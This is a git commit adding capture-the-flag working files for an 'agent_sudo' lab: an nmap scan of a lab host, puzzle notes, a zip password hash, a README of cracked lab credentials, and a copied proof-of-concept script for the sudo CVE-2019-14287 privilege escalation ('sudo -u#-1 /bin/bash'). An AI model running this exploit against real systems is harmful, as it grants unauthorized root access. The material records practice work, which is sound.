From 8e07e852ee302516e02e8d2773ca45538c28910e Mon Sep 17 00:00:00 2001 From: Raghuram Subramani Date: Sat, 17 Sep 2022 21:21:29 -0400 Subject: add agent_sudo --- agent_sudo/47502.py | 80 ++++++++++++++++++++++++++ agent_sudo/Alien_autospy.jpg | Bin 0 -> 42189 bytes agent_sudo/README.md | 6 ++ agent_sudo/To_agentJ.txt | 6 ++ agent_sudo/_cutie.png.extracted/365 | Bin 0 -> 279312 bytes agent_sudo/_cutie.png.extracted/365.zlib | Bin 0 -> 33973 bytes agent_sudo/_cutie.png.extracted/8702.zip | Bin 0 -> 280 bytes agent_sudo/_cutie.png.extracted/To_agentR.txt | 6 ++ agent_sudo/cute-alien.jpg | Bin 0 -> 33143 bytes agent_sudo/cutie.png | Bin 0 -> 34842 bytes agent_sudo/forjohn_zip | 1 + agent_sudo/message.txt | 8 +++ agent_sudo/nmap | 25 ++++++++ 13 files changed, 132 insertions(+) create mode 100644 agent_sudo/47502.py create mode 100644 agent_sudo/Alien_autospy.jpg create mode 100644 agent_sudo/README.md create mode 100644 agent_sudo/To_agentJ.txt create mode 100644 agent_sudo/_cutie.png.extracted/365 create mode 100644 agent_sudo/_cutie.png.extracted/365.zlib create mode 100644 agent_sudo/_cutie.png.extracted/8702.zip create mode 100644 agent_sudo/_cutie.png.extracted/To_agentR.txt create mode 100644 agent_sudo/cute-alien.jpg create mode 100644 agent_sudo/cutie.png create mode 100644 agent_sudo/forjohn_zip create mode 100644 agent_sudo/message.txt create mode 100644 agent_sudo/nmap (limited to 'agent_sudo') diff --git a/agent_sudo/47502.py b/agent_sudo/47502.py new file mode 100644 index 0000000..907d29a --- /dev/null +++ b/agent_sudo/47502.py @@ -0,0 +1,80 @@ +# Exploit Title : sudo 1.8.27 - Security Bypass +# Date : 2019-10-15 +# Original Author: Joe Vennix +# Exploit Author : Mohin Paramasivam (Shad0wQu35t) +# Version : Sudo <1.8.28 +# Tested on Linux +# Credit : Joe Vennix from Apple Information Security found and analyzed the bug +# Fix : The bug is fixed in sudo 1.8.28 +# CVE : 2019-14287 + +'''Check for the user sudo permissions + +sudo -l + +User hacker may run the following commands on kali: + (ALL, !root) /bin/bash + + +So user hacker can't run /bin/bash as root (!root) + + +User hacker sudo privilege in /etc/sudoers + +# User privilege specification +root ALL=(ALL:ALL) ALL + +hacker ALL=(ALL,!root) /bin/bash + + +With ALL specified, user hacker can run the binary /bin/bash as any user + +EXPLOIT: + +sudo -u#-1 /bin/bash + +Example : + +hacker@kali:~$ sudo -u#-1 /bin/bash +root@kali:/home/hacker# id +uid=0(root) gid=1000(hacker) groups=1000(hacker) +root@kali:/home/hacker# + +Description : +Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv +-u#-1 returns as 0 which is root's id + +and /bin/bash is executed with root permission +Proof of Concept Code : + +How to use : +python3 sudo_exploit.py + +''' + + +#!/usr/bin/python3 + +import os + +#Get current username + +username = input("Enter current username :") + + +#check which binary the user can run with sudo + +os.system("sudo -l > priv") + + +os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary") + +binary_file = open("binary") + +binary= binary_file.read() + +#execute sudo exploit + +print("Lets hope it works") + +os.system("sudo -u#-1 "+ binary) \ No newline at end of file diff --git a/agent_sudo/Alien_autospy.jpg b/agent_sudo/Alien_autospy.jpg new file mode 100644 index 0000000..b82c847 Binary files /dev/null and b/agent_sudo/Alien_autospy.jpg differ diff --git a/agent_sudo/README.md b/agent_sudo/README.md new file mode 100644 index 0000000..e20e876 --- /dev/null +++ b/agent_sudo/README.md @@ -0,0 +1,6 @@ +> creds +``` +ftp: chris:crystal +zip: alien +james:hackerrules! +``` diff --git a/agent_sudo/To_agentJ.txt b/agent_sudo/To_agentJ.txt new file mode 100644 index 0000000..8cd771b --- /dev/null +++ b/agent_sudo/To_agentJ.txt @@ -0,0 +1,6 @@ +Dear agent J, + +All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you. + +From, +Agent C diff --git a/agent_sudo/_cutie.png.extracted/365 b/agent_sudo/_cutie.png.extracted/365 new file mode 100644 index 0000000..0a09622 Binary files /dev/null and b/agent_sudo/_cutie.png.extracted/365 differ diff --git a/agent_sudo/_cutie.png.extracted/365.zlib b/agent_sudo/_cutie.png.extracted/365.zlib new file mode 100644 index 0000000..be7e8d6 Binary files /dev/null and b/agent_sudo/_cutie.png.extracted/365.zlib differ diff --git a/agent_sudo/_cutie.png.extracted/8702.zip b/agent_sudo/_cutie.png.extracted/8702.zip new file mode 100644 index 0000000..ead18d3 Binary files /dev/null and b/agent_sudo/_cutie.png.extracted/8702.zip differ diff --git a/agent_sudo/_cutie.png.extracted/To_agentR.txt b/agent_sudo/_cutie.png.extracted/To_agentR.txt new file mode 100644 index 0000000..732bb92 --- /dev/null +++ b/agent_sudo/_cutie.png.extracted/To_agentR.txt @@ -0,0 +1,6 @@ +Agent C, + +We need to send the picture to 'QXJlYTUx' as soon as possible! + +By, +Agent R diff --git a/agent_sudo/cute-alien.jpg b/agent_sudo/cute-alien.jpg new file mode 100644 index 0000000..1780a48 Binary files /dev/null and b/agent_sudo/cute-alien.jpg differ diff --git a/agent_sudo/cutie.png b/agent_sudo/cutie.png new file mode 100644 index 0000000..6e51f7c Binary files /dev/null and b/agent_sudo/cutie.png differ diff --git a/agent_sudo/forjohn_zip b/agent_sudo/forjohn_zip new file mode 100644 index 0000000..bac0057 --- /dev/null +++ b/agent_sudo/forjohn_zip @@ -0,0 +1 @@ +8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip diff --git a/agent_sudo/message.txt b/agent_sudo/message.txt new file mode 100644 index 0000000..090aa63 --- /dev/null +++ b/agent_sudo/message.txt @@ -0,0 +1,8 @@ +Hi james, + +Glad you find this message. Your login password is hackerrules! + +Don't ask me why the password look cheesy, ask agent R who set this password for you. + +Your buddy, +chris diff --git a/agent_sudo/nmap b/agent_sudo/nmap new file mode 100644 index 0000000..7a021cd --- /dev/null +++ b/agent_sudo/nmap @@ -0,0 +1,25 @@ +# Nmap 7.92 scan initiated Sat Sep 17 05:55:05 2022 as: nmap -vvv -p 21,22,80 -sC -sV -oN nmap 10.10.14.85 +Nmap scan report for 10.10.14.85 +Host is up, received conn-refused (0.14s latency). +Scanned at 2022-09-17 05:55:05 EDT for 15s + +PORT STATE SERVICE REASON VERSION +21/tcp open ftp syn-ack vsftpd 3.0.3 +22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA) +| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r +| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA) +| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68= +| 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519) +|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt +80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) +|_http-title: Annoucement +| http-methods: +|_ Supported Methods: GET HEAD POST OPTIONS +|_http-server-header: Apache/2.4.29 (Ubuntu) +Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel + +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Sep 17 05:55:20 2022 -- 1 IP address (1 host up) scanned in 15.26 seconds -- cgit v1.2.3